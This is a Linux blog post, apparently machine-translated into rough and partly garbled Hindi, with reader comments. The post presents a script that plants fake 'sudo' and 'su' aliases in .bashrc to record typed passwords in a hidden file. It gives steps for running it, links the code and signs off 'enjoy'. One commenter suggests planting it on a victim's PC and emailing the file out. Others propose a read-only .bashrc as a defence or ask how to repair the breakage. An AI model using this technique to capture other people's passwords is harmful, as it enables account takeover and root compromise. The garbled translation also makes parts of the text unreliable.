मैं एक स्क्रिप्ट भर में आया हूं जो .bashrc "sudo" और "su" के लिए एक उपनाम बनाता है। बाद में इसे पुनर्स्थापित करने के लिए फ़ाइल का बैकअप बनाए बिना पहले नहीं।
यह क्या करता है कि यह "sudo" या "su" का उपयोग करते समय एक त्रुटि संदेश भेजता है और ".plog" नामक लॉग में पासवर्ड कैप्चर करता है जो घर में है।
उपयोग की विधि
- स्क्रिप्ट को सहेजें
- इसे निष्पादन अनुमति दें।
- इसे टर्मिनल में चलाएं
- टर्मिनल बंद करें
- रुको।
- फिर .plog फ़ाइल की जाँच करें। और मूल या कुछ उपयोगकर्ता का पासवर्ड होना चाहिए जो कि sudoers में है।
http://paste.desdelinux.net/4691
का आनंद लें।
इस लोगों के लिए, यह है कि हमारी टीम की शारीरिक सुरक्षा की उपेक्षा नहीं की जानी चाहिए
यह सही है, अगर पीसी एक पल के लिए उधार दी जाती है, तो आपको उपनामों की जांच करनी होगी pc
निर्दोष प्रश्न:
स्क्रिप्ट कैसे बदलती है? एक गैर-स्वदेशी उपयोगकर्ता के .bashrc?
Oo मैं वास्तव में इसे पसंद करता हूं। परिक्षण।
तो सुरक्षा और एन्क्रिप्शन जो हम gnu / linux में उपयोग करते हैं बेकार हैं? मुझे लगता है कि ऐसा नहीं है, जो भी कोशिश करता है उसे परिणामों पर टिप्पणी करनी चाहिए। इस प्रणाली का उपयोग करने के बाद से मैंने पढ़ा है कि लिनक्स में एन्क्रिप्शन का स्तर बहुत अधिक है। पासवर्ड को एक तरफ़ा क्रिप्टोग्राफ़िक कमी एल्गोरिदम का उपयोग करके एन्क्रिप्ट किया गया है और अब यह पता चला है कि एन्क्रिप्शन को सरल स्क्रिप्ट के साथ छोड़ दिया गया है। मुझे खेद है लेकिन यह विश्वास नहीं है।
अगर यह काम करता है, तो देखें। क्या होता है कि स्क्रिप्ट सुडौल और सु के साथ .bashrc में एक उपनाम बनाता है। और जब आप su और / या sudo टाइप करते हैं। वह पहले उर्फ को पढ़ता है। आदेश के रूप में इस तरह नहीं। इसलिए जब आप पासवर्ड लिखते हैं तो वह एक सामान्य टेक्स्ट फ़ाइल में डाल देता है। और फिर यह उपनाम हटा देता है और आपको sudo या आपके सामान्य और वर्तमान का उपयोग करने देता है। मेरा मतलब है, यह एक फ़िशिंग की तरह है। ऐसा नहीं है कि यह एन्क्रिप्शन को बायपास करता है। यह एक फर्जी लॉगिन है।
ठीक है अब अगर मैं समझता हूं, तो मैं पहले से ही उस सुरक्षा को टॉर्चर पर छोड़ देने के लिए आश्चर्यचकित था .. इसे स्पष्ट करने के लिए धन्यवाद।
ज़रूर, लेकिन सबसे मुश्किल बात यह है कि स्क्रिप्ट को पीड़ित के पीसी में घुसने के लिए, इसे चलाने के लिए पाने के लिए और फिर फ़ाइल को दूरस्थ रूप से इकट्ठा करने या ईमेल पर भेजने के लिए। वहाँ हर एक को अपनी कल्पना का उपयोग करना होगा!
मुझे लगता है कि बहुत pacoeloyo, अतिरंजित। यह एक सरल ट्रोजन है, जिसमें उपयोगकर्ता को विभिन्न सुरक्षा उपायों और हमलावर की स्थानीय उपस्थिति को बायपास करने की आवश्यकता होती है। यह किसी भी OS में मौजूद है।
स्क्रिप्ट के बारे में ... यदि मुझसे गलती नहीं हुई है, तो अधिकांश वर्तमान SUDO उपयोगकर्ता के पासवर्ड के साथ प्रमाणित करते हैं, रूट पासवर्ड से नहीं। तो जो पासवर्ड प्राप्त किया जाएगा वह उपयोगकर्ता (sudoers में मौजूद) का है।
सादर
sudo या su के साथ है। इसके अलावा अगर कोई उपयोगकर्ता sudo का उपयोग कर सकता है, तो यह इसलिए है क्योंकि वह sudoers में है और रूट के समान विशेषाधिकार हैं .. या नहीं?
हमेशा नहीं, यह sudoers कॉन्फ़िगरेशन पर निर्भर करता है। वैसे भी, सबसे आम है कि हां, आपकी पूरी पहुंच है।
मुद्दा यह है कि सुडो का उपयोग करके निष्पादित की जाने वाली क्रियाएं आमतौर पर लॉग होती हैं
बस "सु" को लागू करने से आपको रूट खाते तक पहुंच मिलती है।
यदि आप साझा कक्षा या कार्यशाला के वातावरण में अच्छे पासवर्ड का उपयोग करते हैं तो यह बहुत खतरनाक है। वे आपके लिए इसे खेल सकते हैं। खैर, वे इसे निभा सकते थे ...
किसी अजनबी के पासवर्ड की खोज करना उपयोगी नहीं है, लेकिन मुझे लगता है कि एक परिचित व्यक्ति पर्याप्त है।
और याद रखें, अधिकांश अपने पासवर्ड की नकल करते हैं या सामान्य पैटर्न का उपयोग करते हैं। उन्हें कभी कम मत समझो। यदि आप निश्चित रूप से बहुत कमीने हैं ...
खैर, मैं चारों ओर गड़बड़ नहीं करता ... मेरे पास छिपाने के लिए कुछ भी नहीं है, यहां तक कि अंतिम परीक्षा के प्रश्न भी नहीं हैं ... और अगर मुझे पासवर्ड की आवश्यकता है, तो मैं इसे पूछता हूं ... और मेरे पास एक बाहरी हार्ड ड्राइव पर मेरी फाइलें हैं ... मेरे लैपटॉप पर बैकअप के साथ जो रहता है मकान।
हमें सादगी और व्यावहारिकता की तलाश करनी चाहिए, आज मैं जीवित हूं, कल मुझे नहीं पता ... मैं आज जीवित हूं बाकी सभी समयोपरि हैं।
मैं इसे ध्यान में रखूंगा, धन्यवाद।
दिलचस्प है!
इस स्क्रिप्ट को sudoer उपयोगकर्ता में कैसे कॉपी किया जाता है?
यदि आपके पास कंप्यूटर पर खाता है, तो आप किसी अन्य उपयोगकर्ता के घर में प्रवेश नहीं कर सकते जब तक कि आपके पास अनुमति न हो और मुझे अभी भी संदेह है कि आप पीड़ित -Bashrc को संशोधित कर सकते हैं।
मुझे बहुत संदेह है कि यह तब तक काम करेगा जब तक सुडोल उपयोगकर्ता बेहद लापरवाह न हो।
हमें इस मौसम के साथ बहुत सावधान रहना होगा!
एक प्रश्न, अगर मेरे पास रूट पासवर्ड नहीं है, तो मैं फ़ाइल निष्पादन की अनुमति कैसे दे सकता हूं? या एक सामान्य उपयोगकर्ता काम करता है?
स्पष्ट। निष्पादित अनुमतियाँ रूट के लिए अनन्य नहीं हैं।
मदद!
इसे आज़माने के बाद, मैंने .sudo_sd को हटा दिया है और इसे Google (या अन्य खोज इंजन) में कुछ भी नहीं मिल रहा है
मैंने .plog हटा दिया है और यह स्वचालित रूप से हटा दिया गया है। sudo_sd और मैं रूट के रूप में लॉगिन नहीं कर सकता
ALIASES पर कमेंट करके तय किया गया
अगर यह एक मैक पर काम करता है, तो मैं एक Apple स्टोर ट्रोल करूँगा ... अरे! लेकिन केवल एक छोटा, आतंकवादी योजना में नहीं not
दिलचस्प प्रविष्टि
एक संदेह
और अगर मैं kde में gksu या समकक्ष का उपयोग करता हूं
यह पासवर्ड भी कैप्चर करता है
सादर
.Bashrc को केवल-पढ़ने की अनुमति देकर इस स्क्रिप्ट के निष्पादन से बचा जा सकता है
परीक्षण किया गया, यह काम करता है, औंक की अपनी सीमाएं हैं। आप हमेशा लिनक्स में नई चीजें सीखते हैं।
एक बार किए गए परिवर्तनों को मैं कैसे वापस ला सकता हूं? मैंने हटाया है। Plog और यह मुझे sudo का उपयोग नहीं करने देगा:
bash: /home/alberto/.sudo_sd: फ़ाइल या निर्देशिका मौजूद नहीं है
ALIASES पर कमेंट करके तय किया गया